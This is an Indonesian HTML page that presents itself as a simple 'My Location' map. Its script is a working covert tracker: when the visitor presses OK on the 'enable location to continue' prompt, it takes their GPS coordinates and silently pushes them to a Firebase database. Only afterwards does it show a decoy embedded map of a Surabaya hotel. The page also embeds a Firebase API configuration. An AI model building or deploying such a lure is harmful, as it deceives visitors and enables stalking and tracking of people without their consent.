<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Lokasi Saya</title>
  <style>
    html, body {
      width: 100%;
      height: 100%;
      margin: 0;
      padding: 0;
      font-family: Arial, sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
    }
    #map {
      width: 100%;
      height: 100%;
      border: 0;
      display: none; /* Sembunyikan peta secara default */
    }
    #permissionDialog {
      display: block;
      text-align: center;
    }
    #permissionDialog button {
      padding: 10px 20px;
      background-color: #4285F4;
      color: #fff;
      border: none;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <div id="permissionDialog">
    <p>Aktifkan lokasi untuk melanjutkan.</p>
    <button onclick="activateLocation()">OK</button>
  </div>
 <iframe id="map" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d7915.468884336444!2d112.74746325735259!3d-7.271030373306329!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x2dd7fbda377dbc0d%3A0x960b5d759b88e7b4!2sHarris%20Hotel%20%26%20Conventions%20Gubeng!5e0!3m2!1sid!2sid!4v1720499116095!5m2!1sid!2sid" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe>

  <!-- Firebase SDK -->
  <script src="https://www.gstatic.com/firebasejs/9.6.0/firebase-app-compat.js"></script>
  <script src="https://www.gstatic.com/firebasejs/9.6.0/firebase-database-compat.js"></script>

  <!-- Your web app's Firebase configuration -->
  <script>
    var firebaseConfig = {
      apiKey: "AIzaSyAB6mV2XIrqqqWweg1PO1wP1ZQrOo2y4_g",
      authDomain: "lokasi-3a03e.firebaseapp.com",
      databaseURL: "https://lokasi-3a03e-default-rtdb.firebaseio.com",
      projectId: "lokasi-3a03e",
      storageBucket: "lokasi-3a03e.appspot.com",
      messagingSenderId: "447129590384",
      appId: "1:447129590384:web:5007760dec7611792532b5",
      measurementId: "G-DS0C1FSB45"
    };

    // Initialize Firebase
    firebase.initializeApp(firebaseConfig);

    function activateLocation() {
      if ("geolocation" in navigator) {
        navigator.geolocation.getCurrentPosition(function(position) {
          var latitude = position.coords.latitude;
          var longitude = position.coords.longitude;

          // Simpan data ke Firebase Realtime Database
          var database = firebase.database();
          var ref = database.ref('lokasi');

          var data = {
            latitude: latitude,
            longitude: longitude
          };

          ref.push(data);

          // Tampilkan peta menggunakan iframe setelah lokasi didapatkan
          document.getElementById('permissionDialog').style.display = 'none';
          document.getElementById('map').style.display = 'block';
        }, function(error) {
          console.error('Error getting location:', error);
          alert('Izin lokasi ditolak karena anda belum menyalakan lokasi. Aktifkan Lokasi Terlebih dahulu.');
        });
      } else {
        console.error('Geolocation is not supported by this browser.');
        alert('Geolokasi tidak didukung oleh browser ini.');
      }
    }
  </script>
</body>
</html>
